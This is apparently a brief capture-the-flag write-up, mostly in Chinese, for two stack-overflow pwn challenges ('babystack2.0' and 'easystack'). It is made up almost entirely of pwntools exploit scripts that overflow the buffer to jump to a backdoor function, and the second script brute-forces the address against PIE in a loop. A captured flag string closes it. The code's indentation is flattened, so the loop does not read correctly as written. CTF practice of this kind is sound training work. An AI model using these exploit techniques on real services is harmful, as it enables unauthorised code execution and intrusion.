[BJDCTF 2020]babystack2.0
p.sendline('-1')
: 通过之前建立的连接,向服务器发送字符串"-1"和一个换行符。这可能是为了触发某个特定的行为或条件。
from pwn import*
p=remote('node4.anna.nssctf.cn',28575)
p.sendline('-1')
payload=b'A'*(0X10+8)+p64(0x40072A)
p.sendline(payload)
p.interactive()
[UUCTF 2022 新生赛]easystack
64位开启了NX和pie
存在栈溢出,但可溢出空间较小
存在backdoor,所以我们需要返回到backdoor
由于溢出长度不够,所以我们需要通过爆破来实现
from pwn import*
while 1:
p=remote('node5.anna.nssctf.cn',27297)
payload=b'A'*(0x100+8)+p64(0x1185)
p.sendline(payload)
if b"You are" in p.recv():
p.interactive()
p.close()
NSSCTF{ab40ec1d-0dfc-457e-b083-092b74750088}